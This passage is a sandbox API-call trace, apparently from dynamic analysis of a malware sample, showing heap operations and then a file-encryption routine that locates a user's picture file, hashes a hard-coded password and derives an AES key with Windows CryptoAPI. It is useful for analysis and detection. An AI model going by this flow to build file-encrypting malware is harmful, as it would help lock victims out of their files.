lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0086.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0086.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0086.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0086.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0086.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0086.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0086.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0086.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0086.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0086.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0086.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0086.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0086.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0086.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0086.769] FreeLibrary (hLibModule=0x772d0000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0086.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0086.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0086.771] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0086.771] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0086.771] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0086.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0086.772] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0086.773] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0086.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0086.774] CloseHandle (hObject=0x298) returned 1 [0086.774] FreeLibrary (hLibModule=0x772d0000) returned 1 [0086.774] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0086.774] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\5MOGH3JqsJ.bmp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb9d9970, ftCreationTime.dwHighDateTime=0x1d5e4b9, ftLastAccessTime.dwLowDateTime=0xb5223e70, ftLastAccessTime.dwHighDateTime=0x1d5e2a1, ftLastWriteTime.dwLowDateTime=0xb5223e70, ftLastWriteTime.dwHighDateTime=0x1d5e2a1, nFileSizeHigh=0x0, nFileSizeLow=0x8c24, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="5MOGH3JqsJ.bmp", cAlternateFileName="5MOGH3~1.BMP")) returned 0x41ac100 [0086.775] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0086.775] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0086.775] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.775] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0086.775] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0086.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0086.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0086.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0086.775] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0086.776] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0086.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0086.776] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0086.776] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0086.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0086.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.776] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0086.776] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0086.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca610, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0086.776] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0086.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0086.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0086.776] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0086.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0086.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0086.777] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0086.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca730, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0086.777] CryptHashData (hHash=0x41ac180, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0086.777] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.777] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0086.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0086.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca6b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0086.777] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac280) returned 1 [0086.817] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.817] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0086.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0086.817] CryptDestroyHash (hHash=0x41ac180) returned 1 [0086.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0086.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0086.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0086.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0086.817] RtlAllocateHeap 